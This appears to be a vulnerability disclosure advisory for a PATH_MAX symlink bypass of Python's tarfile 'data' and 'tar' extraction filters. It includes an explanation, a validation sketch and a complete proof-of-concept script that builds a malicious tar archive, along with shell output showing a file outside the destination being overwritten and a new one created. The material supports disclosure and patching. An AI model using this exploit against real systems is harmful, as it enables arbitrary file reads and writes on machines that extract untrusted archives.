Python's TarFile.extractall() and TarFile.extract() methods accept a filter argument intended to make extraction safer. Python's standard library provides two safety-oriented implementations, tar_filter ("tar") and data_filter ("data"), each applying a different set of checks to tarfile extraction.
A bug exists when a path containing symlinks is shorter than PATH_MAX as written, but longer than PATH_MAX once the symlinks are substituted by os.path.realpath(). Any symlinks that fall beyond PATH_MAX are not expanded.
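The length arithmetic can be made concrete with the Linux numbers used by the proof of concept in this advisory: 16 one-character symlinks, each pointing at a 247-character directory name, followed by a 254-character final link. The PATH_MAX value of 4096 is the usual Linux value and is an assumption here, and the destination prefix is ignored for simplicity.

```python
PATH_MAX = 4096              # assumed: typical Linux value (1024 on macOS)
steps = "abcdefghijklmnop"   # 16 one-character symlink names
comp = "d" * 247             # directory name each symlink points to
final = "l" * 254            # name of the final symlink

# Path as written in the archive: a/b/.../p/lll...l
short_path = "/".join(steps) + "/" + final

# The same path after every one-character symlink is replaced by its target.
expanded_dirs = (comp + "/") * len(steps)
expanded_path = expanded_dirs + final

print(len(short_path))      # 286
print(len(expanded_dirs))   # 3968
print(len(expanded_path))   # 4222

# The written path fits within PATH_MAX; the expanded one does not.
print(len(short_path) < PATH_MAX < len(expanded_path))   # True
```

The expanded directories take 3968 bytes, which leaves 128 bytes of PATH_MAX for the destination prefix and the first characters of the final link, so that link sits exactly where expansion stops.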
os.path.realpath() is used by the "tar" and "data" filters to validate the path, but no error is raised if PATH_MAX is exceeded. Later, during extractall() or extract(), the paths are used without being passed through os.path.realpath().
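The following is a simplified sketch of a realpath-based containment check of the kind described above. It is not the standard library's code, and the helper name `is_within` is hypothetical. It also illustrates that os.path.realpath(), in its default non-strict mode, returns a result instead of raising when the path is longer than PATH_MAX (assumed here to be 4096).

```python
import os
import tempfile

def is_within(dest, name):
    """Hypothetical helper: does `name`, resolved under `dest`, stay inside it?"""
    dest = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest, name))
    return os.path.commonpath([target, dest]) == dest

dest = tempfile.mkdtemp()
os.symlink("..", os.path.join(dest, "up"))  # a symlink that leaves dest

inside = is_within(dest, "file.txt")       # stays under dest
outside = is_within(dest, "up/file.txt")   # realpath() expands "up" to ".."

# A path far longer than PATH_MAX: non-strict realpath() does not raise.
# It still returns a path, so a check like is_within() produces an answer
# even though the components past the limit were never examined.
long_name = "/".join(["d" * 200] * 40)     # roughly 8000 characters
resolved = os.path.realpath(os.path.join(dest, long_name))
too_long_but_resolved = len(resolved) > 4096
```

Because the check only sees whatever realpath() managed to expand, a symlink located past the limit is treated as an ordinary path component, while the operating system still follows it when the shorter, unexpanded path is used during extraction.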
This bug allows for arbitrary file reads and writes outside of the destination path. It has been tested successfully on Linux and OSX.
Critical - Anyone using TarFile.extractall() or TarFile.extract() with filter="data" or filter="tar", directly or indirectly, must patch immediately or introduce other mitigating controls.
This proof-of-concept assumes it is being run under /home/username.
The tar file created in this PoC will modify the file /home/username/flag/flag, which exists outside of the destination path the tar file is extracted into. The tar file will also create /home/username/flag/newfile.
The PoC has been successfully run in Python 3.12.3 and Python 3.13.3 on Linux and Python 3.13.0 on OSX.
    $ pwd
    /home/username
    $ mkdir flag
    $ echo "hello world" > flag/flag
    import tarfile
    import os
    import io
    import sys

    # 247 (55 on OSX) picked so the expanded path of dirs is 3968 bytes long (or 896
    # on OSX), leaving 128 bytes for a prefix and at least a few chars of the link
    comp = 'd' * (55 if sys.platform == 'darwin' else 247)
    steps = "abcdefghijklmnop"
    path = ""

    with tarfile.open("poc.tar", mode="x") as tar:
        # populate the symlinks and dirs that expand in os.path.realpath()
        for i in steps:
            a = tarfile.TarInfo(os.path.join(path, comp))
            a.type = tarfile.DIRTYPE
            tar.addfile(a)
            b = tarfile.TarInfo(os.path.join(path, i))
            b.type = tarfile.SYMTYPE
            b.linkname = comp
            tar.addfile(b)
            path = os.path.join(path, comp)

        # create the final symlink that exceeds PATH_MAX and simply points to the
        # top dir. this allows *any* path to be appended.
        # this link will never be expanded by os.path.realpath(), nor anything after it.
        linkpath = os.path.join("/".join(steps), "l"*254)
        l = tarfile.TarInfo(linkpath)
        l.type = tarfile.SYMTYPE
        l.linkname = ("../" * len(steps))
        tar.addfile(l)

        # make a symlink outside to keep the tar command happy
        e = tarfile.TarInfo("escape")
        e.type = tarfile.SYMTYPE
        e.linkname = linkpath + "/../flag"
        tar.addfile(e)

        # use the symlinks above, that are not checked, to create a hardlink
        # to a file outside of the destination path
        f = tarfile.TarInfo("flaglink")
        f.type = tarfile.LNKTYPE
        f.linkname = "escape/flag"
        tar.addfile(f)

        # now that we have the hardlink we can overwrite the file
        content = b"overwrite\n"
        c = tarfile.TarInfo("flaglink")
        c.type = tarfile.REGTYPE
        c.size = len(content)
        tar.addfile(c, fileobj=io.BytesIO(content))

        # we can also create new files as well!
        content = b"new!\n"
        n = tarfile.TarInfo("escape/newfile")
        n.type = tarfile.REGTYPE
        n.size = len(content)
        tar.addfile(n, fileobj=io.BytesIO(content))
    $ pwd
    /home/username
    $ ls flag  # check the flag dir and file are unchanged
    flag
    $ cat flag/flag
    hello world
    $ mkdir test  # this is where the tar is extracted
    $ mkdir otherdir  # this is a dummy dir to keep everything clean
    $ cd otherdir
    $ python3
    Python 3.12.3 (main, Apr 10 2024, 05:33:47) [GCC 13.2.0] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> c
    >>> CTRL-D
    $ cd ..
    $ ls flag  # the flag dir is different!
    flag newfile
    $ cat flag/flag
    overwrite
    $ cat flag/newfile
    new!
Date reported: 04/30/2025
Date fixed:
Date disclosed: 07/20/2025